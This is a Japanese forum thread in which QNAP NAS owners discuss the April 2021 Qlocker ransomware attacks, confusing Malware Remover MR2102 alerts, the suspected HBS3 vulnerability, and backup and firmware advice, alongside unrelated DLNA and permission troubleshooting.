2021/04/26(月) 19:53:40.38ID:48Vx6E8L0 LANケーブルを抜いておく
335不明なデバイスさん (ワッチョイ 47ad-On6t)
2021/04/26(月) 20:01:55.60ID:8HD7TSMN0 うちのNASにもついさっき侵入がみつかったわ。
幸いMalware Removerを最新にしておいたので
削除されたみたいだが。
幸いMalware Removerを最新にしておいたので
削除されたみたいだが。
336不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/26(月) 20:03:50.12ID:VA5FMeJH0 削除されたっていうことは既に暗号化されてるってことだよ思うけど
337不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/26(月) 20:12:56.50ID:VA5FMeJH0338不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/26(月) 20:16:00.32ID:EVzy48kp0 1. Linuxサーバの外部公開が本当に必要なのかくれぐれも検討する
2. サーバを外部公開するのであればしかるべき措置を講じる
3. 「おい、2.の詳細」と思った人は外部公開しない
4. LAN内だけの使用でも便利で楽しいよ
世界中からアクセスが来るサーバの管理者を是非ともやりたいのか
そんなこわそうな役目なんてやりたくもないのか考えてみませんか
2. サーバを外部公開するのであればしかるべき措置を講じる
3. 「おい、2.の詳細」と思った人は外部公開しない
4. LAN内だけの使用でも便利で楽しいよ
世界中からアクセスが来るサーバの管理者を是非ともやりたいのか
そんなこわそうな役目なんてやりたくもないのか考えてみませんか
339不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/26(月) 21:04:02.42ID:65qQL2h70 ポートって8080から変えたほうが良いとの事なんですけど、何番が良いという決まりはあるんですか?
8081でもいいんでしょうか
8081でもいいんでしょうか
340不明なデバイスさん (ワッチョイ 8b10-On6t)
2021/04/26(月) 21:14:54.03ID:sk2YU8WH0 ついさっき以下のログが発生した
qnapと関連している外部公開ポートはないし7zは見つからない
これから調べるぜ
Malware Remover Malware Removal [Malware Remover] Removed vulnerable files or folders. Malware ID: MR2102
qnapと関連している外部公開ポートはないし7zは見つからない
これから調べるぜ
Malware Remover Malware Removal [Malware Remover] Removed vulnerable files or folders. Malware ID: MR2102
341不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/26(月) 21:15:19.23ID:VA5FMeJH0 8081はサーバーでよく使われるから、49152-65535の間から選ぶといい
342不明なデバイスさん (ワッチョイ 06e4-iCxJ)
2021/04/26(月) 21:19:24.55ID:bHsZBOV30 いつの間にか見慣れないユーザーが2つできていた。一つはwasrhereという名前、admin権限付いてた。もう一つはでたらめな文字列、消してしまったので詳細不明。Qlockerと関係あると思うんだけど。
343不明なデバイスさん (ワッチョイ 06e4-iCxJ)
2021/04/26(月) 21:20:11.58ID:bHsZBOV30 間違えた、名前はwasthere
345不明なデバイスさん (ワッチョイ cf5f-UryE)
2021/04/26(月) 21:33:55.79ID:LE3inFz70 つい今さっきMalwareRemoverからMR2102を削除したって出た
でも、検索しても.7zのファイル一つもないけど
これ助かったのかな?
でも、MalwareRemoverを最新にしたのって23日でそれから数日の定期サーチで引っかかってないのにいきなり定期じゃない20時にスキャンされて見つかってるってのが不思議
でも、検索しても.7zのファイル一つもないけど
これ助かったのかな?
でも、MalwareRemoverを最新にしたのって23日でそれから数日の定期サーチで引っかかってないのにいきなり定期じゃない20時にスキャンされて見つかってるってのが不思議
346不明なデバイスさん (ワッチョイ e75f-12fG)
2021/04/26(月) 21:35:43.76ID:rahYZLSl0 >>340
うちも同じの出たが、これは外部からアクションがあったからなのか、みんなほぼ同時にってことは何かアプリの動作なのか
うちも同じの出たが、これは外部からアクションがあったからなのか、みんなほぼ同時にってことは何かアプリの動作なのか
347不明なデバイスさん (ワッチョイ fb54-On6t)
2021/04/26(月) 21:43:01.35ID:x9BXLUfM0 挙動が不明だな
QNAPの本拠がクラックされてランサム時限爆弾入りのアプリ配ったんじゃ無いかと恐れてるわ
QNAPの本拠がクラックされてランサム時限爆弾入りのアプリ配ったんじゃ無いかと恐れてるわ
348不明なデバイスさん (ワッチョイ 8b10-On6t)
2021/04/26(月) 21:43:33.44ID:sk2YU8WH0 >>344,346
うちはMailwareRemoverは毎晩3時に実行する設定だけど、今回は20:37の実行結果だった
今はログ調べ中だけどこれだけ散見するとミスな気もするな
とりあえず外部バックアップドライブは抜いておいた
うちはMailwareRemoverは毎晩3時に実行する設定だけど、今回は20:37の実行結果だった
今はログ調べ中だけどこれだけ散見するとミスな気もするな
とりあえず外部バックアップドライブは抜いておいた
349不明なデバイスさん (ワッチョイ f87d-On6t)
2021/04/26(月) 21:45:01.08ID:MTPl1AMI0 >>333
QNAPのサイトには321バックアップしとけって書いてあったよ
QNAPのサイトには321バックアップしとけって書いてあったよ
350不明なデバイスさん (ワッチョイ 245f-On6t)
2021/04/26(月) 21:48:22.73ID:+GDB/EtF0 >>340
うちのも今日出た、3台
OS:最新(TVS-863@4.5.2.1594、TVS-873@4.5.2.1630、TS-653D@4.5.2.1630)
3台共通で
Malware Remover:最新、昨日のスキャンでは引っかかっていない
HBS:最新
myQNAPcloud:未使用
UPnP:無効
マルチホーム構成で、QNAPサービスへのアクセスは隔離LANだけにして、
外に出るルーター側LANはサービスバインドを全て外している
*.7zも自分で作ったもの以外は無し
Malware ID: MR2102は何者なのか?
うちのも今日出た、3台
OS:最新(TVS-863@4.5.2.1594、TVS-873@4.5.2.1630、TS-653D@4.5.2.1630)
3台共通で
Malware Remover:最新、昨日のスキャンでは引っかかっていない
HBS:最新
myQNAPcloud:未使用
UPnP:無効
マルチホーム構成で、QNAPサービスへのアクセスは隔離LANだけにして、
外に出るルーター側LANはサービスバインドを全て外している
*.7zも自分で作ったもの以外は無し
Malware ID: MR2102は何者なのか?
351不明なデバイスさん (ワッチョイ b0b1-UCah)
2021/04/26(月) 21:49:33.96ID:d1GC5SB30352不明なデバイスさん (ワッチョイ 5e36-XuTf)
2021/04/26(月) 21:52:01.10ID:51V68RHF0 >>345
うちもそれや! hbs3もマルチメディアも無いけど、443でログだけ? リムーバーのログが中途半端すぎ。
うちもそれや! hbs3もマルチメディアも無いけど、443でログだけ? リムーバーのログが中途半端すぎ。
353不明なデバイスさん (ワッチョイ 5e36-XuTf)
2021/04/26(月) 22:04:05.43ID:51V68RHF0 リムーバーが警告メッセージ出してるだけちゃうかな。。
アタックで何か出来たわけじゃない感じしない?
アタックで何か出来たわけじゃない感じしない?
354不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/26(月) 22:08:54.95ID:EVzy48kp0 マルウェア削除時のログが>>272 (ありがたいことに載せてくれた)
いまザワザワしてる人らのは Removed vulnerable files or folders でしょ
ついでに定義更新後にインスタントスキャンが入る設定にしてるでしょ
いまザワザワしてる人らのは Removed vulnerable files or folders でしょ
ついでに定義更新後にインスタントスキャンが入る設定にしてるでしょ
355不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/26(月) 22:09:16.42ID:VA5FMeJH0 [Malware Remover] Removed vulnerable files or folders. Malware ID: MR2102
うちのでもこれが出てた、同時刻に /usr/local/sbin/7z が更新されているのでこの関係かもしれない
(定義ファイル実行後に自動的にスキャンが行われる)
海外のフォーラムで状況を見てみると…
うちのでもこれが出てた、同時刻に /usr/local/sbin/7z が更新されているのでこの関係かもしれない
(定義ファイル実行後に自動的にスキャンが行われる)
海外のフォーラムで状況を見てみると…
356不明なデバイスさん (ワッチョイ 8b10-On6t)
2021/04/26(月) 22:09:17.74ID:sk2YU8WH0 https://www.reddit.com/r/qnap/comments/mwbcl3/removed_the_detected_malware_mr2102/
ここでも混乱中だね
あらためてsshでfindして7z探したけど改ざんされたものはやっぱり無かった
様子見かな
ここでも混乱中だね
あらためてsshでfindして7z探したけど改ざんされたものはやっぱり無かった
様子見かな
357不明なデバイスさん (ワッチョイ 8cbb-On6t)
2021/04/26(月) 22:16:04.71ID:VebzV5cI0 .qpkg/MalwareRemover/.quarantine にログの時刻の隔離された?っぽいフォルダがあるが
どれが悪いんだかわからんね
どれが悪いんだかわからんね
358不明なデバイスさん (ワッチョイ 8b10-On6t)
2021/04/26(月) 22:27:34.59ID:sk2YU8WH0 >>357
その階層みたら2021_04_26_20_37_55.infoと2021_04_26_20_37_55.quarがあった
後者はバイナリなのでわからないけど、前者は「.qpkg/HybridBackup/rr2」内のファイルが記載されてるね
HBSのファイルを隔離したのか?
その階層みたら2021_04_26_20_37_55.infoと2021_04_26_20_37_55.quarがあった
後者はバイナリなのでわからないけど、前者は「.qpkg/HybridBackup/rr2」内のファイルが記載されてるね
HBSのファイルを隔離したのか?
359不明なデバイスさん (ワッチョイ 5e36-XuTf)
2021/04/26(月) 22:46:29.97ID:51V68RHF0 MR2102対策済みのリムーバーです!ってメッセージが出るだけで特に問題無しってことで寝ます。
360357 (ワッチョイ 8cbb-On6t)
2021/04/26(月) 22:52:08.70ID:VebzV5cI0 >>358
同じくこちらにもrrは2あった、そしてHBS3は毎日使用している
あとは etc/config/qsync/home/mgnt_cgi/ というのもあった
まあ、何を隔離したかログ残してよって感じではあるw
同じくこちらにもrrは2あった、そしてHBS3は毎日使用している
あとは etc/config/qsync/home/mgnt_cgi/ というのもあった
まあ、何を隔離したかログ残してよって感じではあるw
361不明なデバイスさん (ワッチョイ 4652-zvOL)
2021/04/26(月) 23:55:53.20ID:mWGop00M0 >>339
自分なら、そんな推測されやすいポートにはしない。
自分なら、そんな推測されやすいポートにはしない。
364不明なデバイスさん (ワッチョイ 3868-On6t)
2021/04/27(火) 00:12:14.07ID:DxIJxJkl0365不明なデバイスさん (ワッチョイ 06c3-Bsub)
2021/04/27(火) 00:32:21.66ID:XJzYtoyJ0 何でここまでされてQnapから移らんの?
366不明なデバイスさん (ワッチョイ 9b5f-2tiM)
2021/04/27(火) 00:37:20.22ID:ky21RMtB0 昔からVPN経由でしか外部からのアクセスを許可してなかったんだけどmyqnapcloud設定すると生でwebサーバ公開するの?
ルータがあるときはupnpでポート変換で。
ルータがあるときはupnpでポート変換で。
367不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/27(火) 00:45:21.62ID:FVH+VKWJ0 はい
368不明なデバイスさん (ワッチョイ a282-On6t)
2021/04/27(火) 00:53:38.40ID:qKnJaxv+0 金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ
369不明なデバイスさん (ワントンキン MM88-COaZ)
2021/04/27(火) 02:51:46.62ID:YJh8w1vuM 馬鹿な連中が騒いでいるだけか
370不明なデバイスさん (ワッチョイ b6b7-msKI)
2021/04/27(火) 05:50:58.87ID:/jB9WuHH0 QNAP対応グダグダ杉
malware removerが大事なファイルを誤認削除もワンチャンあるでこれ
malware removerが大事なファイルを誤認削除もワンチャンあるでこれ
371不明なデバイスさん (ワッチョイ a45f-yH17)
2021/04/27(火) 06:04:42.66ID:UQ8QheRF0 HBSが今回の件の後バージョンアップしてから、メチャメチャ遅くなったような気がするのは気のせいなんかな。
372不明なデバイスさん (テテンテンテン MM34-KW5B)
2021/04/27(火) 06:27:35.69ID:4J2F8LUOM 大事なファイルはクラウドとBD-Rだな。つくづく思った
373不明なデバイスさん (ワッチョイ e6e8-jaYo)
2021/04/27(火) 06:44:25.57ID:zCP5CThV0 >>372
どこが安全ちゅうこともないよ。方法と場所を分けるって意味ならその通り。
どこが安全ちゅうこともないよ。方法と場所を分けるって意味ならその通り。
374不明なデバイスさん (ワッチョイ 1ab6-sVZV)
2021/04/27(火) 07:23:10.77ID:0R2cPWfq0 >>356
関連のところで今見たが
QNAPDaniel
QNAP OFFICIAL SUPPORT
This MR2102 message from Malware remover does not mean you were infected. It means some vulnerability in HBS3 was found and patched.
This scared a lot of people. So I think we are going to try to reword this message.
今回のはどう見ても火に油注いでるね
関連のところで今見たが
QNAPDaniel
QNAP OFFICIAL SUPPORT
This MR2102 message from Malware remover does not mean you were infected. It means some vulnerability in HBS3 was found and patched.
This scared a lot of people. So I think we are going to try to reword this message.
今回のはどう見ても火に油注いでるね
375不明なデバイスさん (ワッチョイ c2ab-T6Cp)
2021/04/27(火) 08:38:28.06ID:VQiesfs40376不明なデバイスさん (ワッチョイ 9b5f-bzv4)
2021/04/27(火) 08:44:06.41ID:hLIslc8h0 >>372
今回のはHBS3が侵入経路っぽくてHBS3でクラウド同期してた人が食らってる
今回のはHBS3が侵入経路っぽくてHBS3でクラウド同期してた人が食らってる
377不明なデバイスさん (ワッチョイ 2e22-AO4R)
2021/04/27(火) 09:55:15.70ID:w2DbBJ000379不明なデバイスさん (ワッチョイ 9b5f-bzv4)
2021/04/27(火) 13:08:04.68ID:hLIslc8h0 ここの過去ログたけど?
380不明なデバイスさん (ワッチョイ 4163-SFxq)
2021/04/27(火) 13:19:35.51ID:WaNIqjbX0382不明なデバイスさん (ワッチョイ 6fa0-b+U1)
2021/04/27(火) 13:57:56.77ID:UX4kHmZP0 >>381
HBS3に脆弱性があるのは正しいけど、クラウド同期してたから侵入されたのかは不明じゃないの?
HBS3に脆弱性があるのは正しいけど、クラウド同期してたから侵入されたのかは不明じゃないの?
383不明なデバイスさん (ワンミングク MMb8-XmRv)
2021/04/27(火) 14:06:55.22ID:Xc17LwHuM みんなはいつ頃被害受けた?
私は21日の深夜から9時くらいまでなんだけど(タイムスタンプ)
私は21日の深夜から9時くらいまでなんだけど(タイムスタンプ)
384不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/27(火) 15:23:25.79ID:FVH+VKWJ0 >>379
攻撃を受けたユーザのうちの一人がHBS3でクラウド同期していたというレベルの話ではないかと
攻撃を受けたユーザのうちの一人がHBS3でクラウド同期していたというレベルの話ではないかと
385不明なデバイスさん (ペラペラ SD2a-Im0W)
2021/04/27(火) 16:53:22.96ID:bQcGxWnkD これまだ攻撃動いてるんかな
ハニポ仕掛けたら走るんかな
ハニポ仕掛けたら走るんかな
386不明なデバイスさん (ワッチョイ 8e7b-sKTo)
2021/04/27(火) 17:03:11.62ID:pVeSFk2j0 HBSとマルチメディア系使用してると感染率が高いとしか見てない気が
387不明なデバイスさん (テテンテンテン MM34-0oVa)
2021/04/27(火) 17:15:58.28ID:j+osPuGOM adminがアタックされ続けてるという人もいるし、侵入ルートが良く分からんなあ。
388不明なデバイスさん (ワッチョイ df36-BZjc)
2021/04/27(火) 18:48:51.07ID:FVH+VKWJ0 攻撃を受けてみたいのならルーターをデフォルト設定にしてmyQNAPcloudをデフォルトで設定するといいよ
システム管理のポート番号もお好きな番号でOK
あとQTSの言語はロシア語圏以外にすることをお忘れなく
システム管理のポート番号もお好きな番号でOK
あとQTSの言語はロシア語圏以外にすることをお忘れなく
389不明なデバイスさん (ワッチョイ 915f-RXEV)
2021/04/27(火) 19:22:00.25ID:vXQ4+8O00 昔ながらのVPNが正解だったな
391不明なデバイスさん (ワッチョイ 09a5-Im0W)
2021/04/27(火) 19:58:09.55ID:MBTn5m1w0 やられた272です。
みなさんが言っているMarware Removerの通知は当方環境にはないので感染、暗号化されたというわけではなそうです
ちなみに感染時当方HBS3はインストールされていましたが一回も起動した記憶がないもので同期が云々とかは初期状態のままで特に触ってなかったです。
すでにアンインストールしてしまったのですが、参考になれば
あとMyQnapCloudは使用してました。
公式もココからとは言ってないですがadminログインは数分で3回位pass間違えるとIPブロックをかけていたので総当たり攻撃でAdminからというのはあまり考えづらそうですたぶん
みなさんが言っているMarware Removerの通知は当方環境にはないので感染、暗号化されたというわけではなそうです
ちなみに感染時当方HBS3はインストールされていましたが一回も起動した記憶がないもので同期が云々とかは初期状態のままで特に触ってなかったです。
すでにアンインストールしてしまったのですが、参考になれば
あとMyQnapCloudは使用してました。
公式もココからとは言ってないですがadminログインは数分で3回位pass間違えるとIPブロックをかけていたので総当たり攻撃でAdminからというのはあまり考えづらそうですたぶん
392不明なデバイスさん (ワッチョイ 9b5f-2tiM)
2021/04/27(火) 21:59:50.33ID:ky21RMtB0 いかにも悪さしそうなツールならアンインストールしようかという気にもなるけどバックアップツールが突破口にされるとは思わんわな。
393不明なデバイスさん (ワッチョイ 8cbb-X5+L)
2021/04/27(火) 22:03:12.50ID:dlWihrOu0 とりあえず電源切った。
無敵(笑)
無敵(笑)
394不明なデバイスさん (ワントンキン MMb8-bzv4)
2021/04/27(火) 22:08:04.08ID:f9pw8RC+M そうしてPCのバックアップが滞ってるうちに今度はPCがランサムに
395不明なデバイスさん (ワッチョイ 07ca-VTip)
2021/04/27(火) 22:11:06.11ID:7begG4s10 フォーラム情報ではQNAPcloudとUPnPの脆弱性を利用してNASに到達し
HBS3にハードコードされていたマスターパスワードを使って侵入されたようだって結論だったね
そもそもデータ扱う機器のパスワードをハードコードするってどうなんと思うけど
HBS3にハードコードされていたマスターパスワードを使って侵入されたようだって結論だったね
そもそもデータ扱う機器のパスワードをハードコードするってどうなんと思うけど
397不明なデバイスさん (ワッチョイ df10-Ojjt)
2021/04/27(火) 23:32:46.55ID:iWxNmiIc0 うちはMyQNAPCloudもHBS3もUPnPも使ってたけど無事だったな
ルーターも古いNECのヤツだったし
よくわからんね
ルーターも古いNECのヤツだったし
よくわからんね
398不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/27(火) 23:39:47.23ID:Hg2h18E50399不明なデバイスさん (ワッチョイ fb6e-BqgI)
2021/04/28(水) 00:21:36.28ID:FoaOsVrV0 ipv4 over ipv6で接続してた奴はポート解放できんからセーフだったとか
400不明なデバイスさん (ワッチョイ 3868-On6t)
2021/04/28(水) 01:08:42.71ID:v6p92j440 >>399
ISP側の制限ですね。1つのv4アドレスで1024ポート程度ですかね。
そう考えると使っている人いないかも知れませんがワイヤレス系だと
そっちもNATかかっててセーフな場合もあるかもですね。
ISP側の制限ですね。1つのv4アドレスで1024ポート程度ですかね。
そう考えると使っている人いないかも知れませんがワイヤレス系だと
そっちもNATかかっててセーフな場合もあるかもですね。
401不明なデバイスさん (ワッチョイ 968e-iMGS)
2021/04/28(水) 02:44:07.72ID:iVElt2a90 >>400
ただの馬鹿
ただの馬鹿
402不明なデバイスさん (ワッチョイ c2ab-T6Cp)
2021/04/28(水) 07:12:04.16ID:JmehRIHU0404不明なデバイスさん (ワッチョイ 5ed8-sVZV)
2021/04/28(水) 14:20:41.06ID:yfDBA4yC0 >>395
> パスワードをハードコードするってどうなんと思うけど
これ本当なら、犯人は元従業員とか関係者とかそういう可能性はないのかね?
しかし、QNAPって過去のファームウェアでもヤラかしたこともあったし、ムカつくわ
> パスワードをハードコードするってどうなんと思うけど
これ本当なら、犯人は元従業員とか関係者とかそういう可能性はないのかね?
しかし、QNAPって過去のファームウェアでもヤラかしたこともあったし、ムカつくわ
405不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/28(水) 15:30:40.66ID:PcfH0H9D0 システムイベントログってどうやってコピペするの?
ログをドラッグしても選択出来ない…
ログをドラッグしても選択出来ない…
406不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/28(水) 15:31:54.25ID:PcfH0H9D0 すいません普通にコピーってありました…。
408不明なデバイスさん (ワッチョイ dcf9-zdG1)
2021/04/28(水) 22:28:57.38ID:k0U6lOvI0 植木鉢の下にカギを置いてるレベル
409不明なデバイスさん (ワッチョイ 9b5f-2tiM)
2021/04/28(水) 22:42:35.59ID:o7m7WFcC0 脆弱性のあるモジュール読み込みながらも放置してた系じゃないかね。
410不明なデバイスさん (ワッチョイ 2d07-pvp8)
2021/04/29(木) 00:06:31.67ID:rEzaAYfP0 PCにログインパスワード書いた付箋貼っておくレベル?
411不明なデバイスさん (ワッチョイ ac36-BZjc)
2021/04/29(木) 00:31:55.86ID:2TRnx8Ms0 ハードコードされたクレデンシャルの脆弱性と書いたけど
不適切な認証の脆弱性と書き直すレベル
不適切な認証の脆弱性と書き直すレベル
412不明なデバイスさん (スッップ Sd70-qRZI)
2021/04/29(木) 00:33:08.88ID:c2/A6Iq8d 玄関には鍵をかけてても勝手口が開けっぱなしで
三河屋さんが御用聞きに開けてくるレベル。
三河屋さんが御用聞きに開けてくるレベル。
413不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/29(木) 04:33:56.69ID:frPNB1lC0 どなたかご教授お願いできないでしょうか。
adminを無効にし、別のユーザーに権限を与えログインするようにしたのですが、
https://i.imgur.com/y2VGYUO.png
それ以降特定のフォルダ内のファイルを削除できなくなってしまいました。
https://i.imgur.com/BMrGND8.png
ファイルを削除しようとすると、adminからアクセス許可を得る必要があります。と表示されてしまいます。
・試したこと
・QTSのファイルステーションからなら削除出来ました。接続したwindowsのエクスプローラ上から削除できません。
・読み取り専用のチェックを外そうとすると、ハンドルが無効と表示され続けられません。
https://i.imgur.com/vJuV6D1.png
・セキュリティから所有者を新しいユーザ名に変えようとするとアクセスが拒否されました。と出てしまいます。
https://i.imgur.com/SZm31vZ.png
上記の事を試したのですがどうにも解決策が見当たらず困っています。どなたか分かる方いれば宜しくお願い致します。
adminを無効にし、別のユーザーに権限を与えログインするようにしたのですが、
https://i.imgur.com/y2VGYUO.png
それ以降特定のフォルダ内のファイルを削除できなくなってしまいました。
https://i.imgur.com/BMrGND8.png
ファイルを削除しようとすると、adminからアクセス許可を得る必要があります。と表示されてしまいます。
・試したこと
・QTSのファイルステーションからなら削除出来ました。接続したwindowsのエクスプローラ上から削除できません。
・読み取り専用のチェックを外そうとすると、ハンドルが無効と表示され続けられません。
https://i.imgur.com/vJuV6D1.png
・セキュリティから所有者を新しいユーザ名に変えようとするとアクセスが拒否されました。と出てしまいます。
https://i.imgur.com/SZm31vZ.png
上記の事を試したのですがどうにも解決策が見当たらず困っています。どなたか分かる方いれば宜しくお願い致します。
414不明なデバイスさん (ワッチョイ c2ab-T6Cp)
2021/04/29(木) 07:16:57.29ID:MbC8O/7f0415不明なデバイスさん (ワッチョイ 47ad-On6t)
2021/04/29(木) 07:20:27.75ID:MVu6WTRl0 新しいファームウェア来てるな。
さっき当てたけど不具合無さそう・・・多分
さっき当てたけど不具合無さそう・・・多分
416不明なデバイスさん (ワッチョイ da33-3cD6)
2021/04/29(木) 09:15:35.32ID:XL/gS4vq0 結局HBS 3は使うとまずいの?
417不明なデバイスさん (ワッチョイ 1a10-2tiM)
2021/04/29(木) 09:17:56.52ID:nHOzAZ7M0 どなたか教えてください。
dlnaにて写真が表示されなくて困っています。
動画、音楽は表示され、再生も問題なくできます。
Multimedia Consoleには写真の数が表示されています。
dlna機器から写真(JPG)のあるフォルダを表示させるも、「空です」とか「表示できるコンテンツがありません」とか表示されます。
dlnaで画像ファイルに対してのみ行わなければならない設定があるのでしょうか?
dlnaにて写真が表示されなくて困っています。
動画、音楽は表示され、再生も問題なくできます。
Multimedia Consoleには写真の数が表示されています。
dlna機器から写真(JPG)のあるフォルダを表示させるも、「空です」とか「表示できるコンテンツがありません」とか表示されます。
dlnaで画像ファイルに対してのみ行わなければならない設定があるのでしょうか?
418不明なデバイスさん (ワッチョイ b6b7-msKI)
2021/04/29(木) 10:18:50.05ID:Bf++5agn0 画像ファイルの拡張子が7zになってるんじゃね?
419不明なデバイスさん (ワッチョイ 8cbb-On6t)
2021/04/29(木) 10:23:48.72ID:sPHbNKB20 こわいこわいw
420不明なデバイスさん (ワッチョイ b756-fPqG)
2021/04/29(木) 10:27:03.29ID:9YstF0sj0 やべーぞランサムウェアだ
422不明なデバイスさん (ワッチョイ 1a10-2tiM)
2021/04/29(木) 11:27:59.52ID:nHOzAZ7M0 >>417です。
拡張子はJPGで、SMBでは当該フォルダに表示され、閲覧も可能です。
試しにPhoto Stationをインストールしてみましたが、画像ファイルはみつけてくれません。また、Photo Stationからアップロードしてみましたが、アップロードが完了後も何も表示されず、当該ファイルはSMBでは表示、閲覧可能です。
インデックスの作成は完了してます。
拡張子はJPGで、SMBでは当該フォルダに表示され、閲覧も可能です。
試しにPhoto Stationをインストールしてみましたが、画像ファイルはみつけてくれません。また、Photo Stationからアップロードしてみましたが、アップロードが完了後も何も表示されず、当該ファイルはSMBでは表示、閲覧可能です。
インデックスの作成は完了してます。
423不明なデバイスさん (ワッチョイ ac36-Rk3w)
2021/04/29(木) 11:45:55.27ID:2TRnx8Ms0 フォルダの指定はしたの?
424不明なデバイスさん (スッップ Sd70-qRZI)
2021/04/29(木) 11:57:20.93ID:c2/A6Iq8d DLNA機器側の制約っぽそうな気配
425不明なデバイスさん (ワッチョイ 1a10-2tiM)
2021/04/29(木) 12:03:49.58ID:nHOzAZ7M0 フォルダ指定はしてます。
動画、音楽は大丈夫なんですけど、写真だけがダメなんですよね。
動画、音楽は大丈夫なんですけど、写真だけがダメなんですよね。
426不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/29(木) 12:06:24.85ID:kgUH22Na0 拡張子はJPGだけど中身はPNGな物体がメールで送りつけられてきたりするんだけど
そんなファイルになってるわけでもないの?
あとは機器側だとか特殊なJPGだとか
そんなファイルになってるわけでもないの?
あとは機器側だとか特殊なJPGだとか
427不明なデバイスさん (ワッチョイ 1a10-2tiM)
2021/04/29(木) 12:14:05.87ID:nHOzAZ7M0 dlnaで画像ファイルのみ表示されない件、解決しました。
サムネイル生成を無効にしていると、何も表示されないようですね。
ファイル名すら表示されないって、どうなんでしょう。
なんか納得いかないけど、サムネイル生成を有効にして運用することにします。
お騒がせしました。
サムネイル生成を無効にしていると、何も表示されないようですね。
ファイル名すら表示されないって、どうなんでしょう。
なんか納得いかないけど、サムネイル生成を有効にして運用することにします。
お騒がせしました。
428不明なデバイスさん (ワッチョイ c001-m0US)
2021/04/29(木) 12:27:28.15ID:frPNB1lC0 >>414
もちろん全共有フォルダに権限を与えています。
https://i.imgur.com/z6FBTvn.png
それでも削除できません。 QTSのファイルマネージャーからはadminではないユーザでも削除できるのでwidows側の問題かな?と思ったのですが…。
もちろん全共有フォルダに権限を与えています。
https://i.imgur.com/z6FBTvn.png
それでも削除できません。 QTSのファイルマネージャーからはadminではないユーザでも削除できるのでwidows側の問題かな?と思ったのですが…。
429不明なデバイスさん (ワッチョイ dcad-sVZV)
2021/04/29(木) 12:34:52.66ID:kgUH22Na0 Publicの中にあるものだとして自分なら
pushd /share/Public
sudo chown -R newuser:everyone ./*
pushd /share/Public
sudo chown -R newuser:everyone ./*
430不明なデバイスさん (ワッチョイ ac36-BZjc)
2021/04/29(木) 12:46:54.46ID:2TRnx8Ms0 QNAP NASを無防備にインターネットに直接接続してはいけない理由とは
https://blog.qnap.com/ja/nas-internet-connect-ja/
https://blog.qnap.com/ja/nas-internet-connect-ja/
431不明なデバイスさん (ワッチョイ ac36-BZjc)
2021/04/29(木) 12:50:03.01ID:2TRnx8Ms0432不明なデバイスさん (ワッチョイ 2cbd-DhNu)
2021/04/29(木) 14:09:03.92ID:ht7xJxkv0 >>428
自分も、別のadminアカウントを作って、元のadminを無効にしたら、出来る事が限られて困ってたんだよね。
休みに入った事だし色々調べた所、「権限設定」の所の「共有フォルダ」の「高度な許可」で、「拡張フォルダー許可を有効にする」ってのオンにして下層のフォルダまで権限設定をすれば良いのかな?
今それをオンにしてみたが、適用に時間が掛かってる。
自分も、別のadminアカウントを作って、元のadminを無効にしたら、出来る事が限られて困ってたんだよね。
休みに入った事だし色々調べた所、「権限設定」の所の「共有フォルダ」の「高度な許可」で、「拡張フォルダー許可を有効にする」ってのオンにして下層のフォルダまで権限設定をすれば良いのかな?
今それをオンにしてみたが、適用に時間が掛かってる。
433不明なデバイスさん (ワッチョイ 76b2-On6t)
2021/04/29(木) 16:03:26.16ID:n4Ix+Dy00 >430
被害が出てから啓蒙しても遅いんだよ
被害が出てから啓蒙しても遅いんだよ
434不明なデバイスさん (ワッチョイ 8cbb-y8BG)
2021/04/29(木) 16:19:48.59ID:KMUQCjPg0435不明なデバイスさん (ワッチョイ ac36-BZjc)
2021/04/29(木) 16:49:19.74ID:2TRnx8Ms0 HBS 3 Hybrid Backup Sync 3.0.210411
( 2021/04/29 )
[Applicable Models]
- End-of-life NAS models running QTS 4.3.3 or 4.3.4
[Important Notes]
- This is a security update for end-of-life NAS models running QTS versions 4.3.3 and 4.3.4.
[Security Updates]
- Fixed a security vulnerability.
https://www.qnap.com/ja-jp/app_releasenotes/list.php?app_choose=HybridBackup
( 2021/04/29 )
[Applicable Models]
- End-of-life NAS models running QTS 4.3.3 or 4.3.4
[Important Notes]
- This is a security update for end-of-life NAS models running QTS versions 4.3.3 and 4.3.4.
[Security Updates]
- Fixed a security vulnerability.
https://www.qnap.com/ja-jp/app_releasenotes/list.php?app_choose=HybridBackup
436不明なデバイスさん (ワッチョイ ac36-BZjc)
2021/04/29(木) 17:07:13.72ID:2TRnx8Ms0 QTS 4.5.3.1652 Build 20210428
https://www.qnap.com/ja-jp/release-notes/qts/4.5.3.1652/20210428
機能強化されてる
https://www.qnap.com/ja-jp/release-notes/qts/4.5.3.1652/20210428
機能強化されてる
437不明なデバイスさん (ワッチョイ 0e02-On6t)
2021/04/29(木) 17:23:42.87ID:6eue9V+Z0 今回被害は受けなかったけど、とりあえず新しいファームウェアにしておいた。
基本常に最新にしておくほうがいいね。
基本常に最新にしておくほうがいいね。
438不明なデバイスさん (ワッチョイ 2e22-LDMg)
